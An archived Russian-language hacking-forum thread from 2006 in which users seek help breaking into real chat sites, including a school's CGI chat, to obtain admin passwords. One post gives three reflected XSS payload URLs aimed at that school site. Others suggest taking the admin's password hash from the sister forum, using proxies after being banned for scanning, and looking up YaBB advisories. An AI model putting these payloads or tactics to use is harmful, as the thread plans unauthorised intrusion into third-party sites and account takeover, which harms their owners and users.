PDA

Просмотр полной версии : Помогите найти дырочку в чате

Sanixs
14.01.2006, 15:27
есть чат https://chat.mariupol.com.ua помогите найти дырочки!
Sanixs
17.01.2006, 01:41
Народ, ктонить смотрел этот чат? пытались найти какенить баги?
censored!
17.01.2006, 03:06
http://www.forum.antichat.ru/thread7476.html
Если в теме Вам никто не отвечает, значит может быть
два варианта:
а.Еще никто не смотрел и не искал уязвимостей.
б.Уязвимости пока еще не нашли.
censored!
17.01.2006, 03:08
p.s. у них там Форум PhpBB. А на Античате есть поиск. Может проще через Форум?
Sanixs
24.01.2006, 01:17
p.s. у них там Форум PhpBB. А на Античате есть поиск. Может проще через Форум?

Здорова... через форум неполучится... так как форум и чат на разных ИП....
chat.mariupol.com.ua >213.255.232.34
forum.mariupol.com.ua >213.255.232.25
Хотя если это роутер то возможно... но врядли это роутер!
Кстати, я прогонял сканером чат и пополил свой ИП... теперь меня там забанили... нада бы халявные рабочие прокси https, если есть подкинь, я тебе +в репку накину ;)
censored!
24.01.2006, 01:40
нада бы халявные рабочие прокси https, если есть подкинь, я тебе +в репку накину
деловой =)

Тебе Форум нужен, чтобы разузнать пас админа и влезть от его имени в чат (если там один чел всем руководит и пасы и там и там одинаковые). Глядишь и в админку чата попадешь "из нутри".

Там еще вот че есть: Coppermine Photo Gallery

Тебе вообще зачем "найти дырочки"?
_lolik_
30.01.2006, 03:17
http://antichat.ru/proxy/
ссылка на прокси, может репку?
Антошка2003
30.01.2006, 03:36
регаться неохота чтобы смотреть.
dinar_007
30.01.2006, 03:52
Ну и название у темы )))

Дырочки у девушек, а у чатов дыры ))) Бездны ))) Баги ))) ЛОЛ ))) Шутка )))
SK | Heaton
30.01.2006, 10:51
чё т регится не охота =)
Лучше найди чела админа иль модера с чата и сответсвенно в форуме возьми хеш обработай должно совпасть 99% хост тот же самый
ViK_WS
31.01.2006, 00:43
Есть чат _http://www.school71.donpac.ru/cgi-bin/chat/chat.cgi мля помогите узнать порольчиу админа!!!!
censored!
31.01.2006, 00:46
Пассивные: _http://www.school71.donpac.ru/cgi-bin/chat/chart.cgi?action=send_pwd&name=<script>alert(/censored!/)</script>

_http://www.school71.donpac.ru/cgi-bin/chat/chart.cgi?action=<script>alert(/censored!/)</script>

_http://www.school71.donpac.ru/cgi-bin/chat/chat.cgi?action=memo&id=&color=ffff00&body="><script>alert(/censored!/)</script>

Но толку тебе от них...
ViK_WS
31.01.2006, 00:51
Говорит что ни чо не получилось!
ViK_WS
31.01.2006, 01:04
Так чо не получилось????
ViK_WS
31.01.2006, 01:08
Слыш а с форум ломануть мож http://www.school71.donpac.ru/cgi-bin/forum/YaBB.pl!
censored!
31.01.2006, 02:34
Че за "слыш"? Че за фамильярности? Ты сайт ломаешь, или я?

http://www.forum.antichat.ru/search.php
Там будет слева поле ввода "Ключевые слова:", вон туда чуть ниже вставь YaBB
Чуть ниже будет "Искать сообщения за последний(юю)", разверни ниспадающее меню и выбери "и старее", потом справа будет полоса прокрутки - мотай вниз и жми пимпу "Начать поиск".
...
http://www.securitylab.ru/vulnerability/204250.php
http://www.securitylab.ru/vulnerability/241900.php
ViK_WS
31.01.2006, 22:29
Цпасибаааа!
DRON-ANARCHY
01.02.2006, 22:18
Че-то я даже зайти не смог на него.
ViK_WS
03.02.2006, 20:01
В смысле зарегится???
WizART
03.02.2006, 20:39
я ничего нормального не нашел, сидел около часа... хз ...
DRON-ANARCHY
04.02.2006, 00:38
Не..в смысле зайти. наверно не вовремя заходил просто.
щас еще раз попробую.

*****

не получилось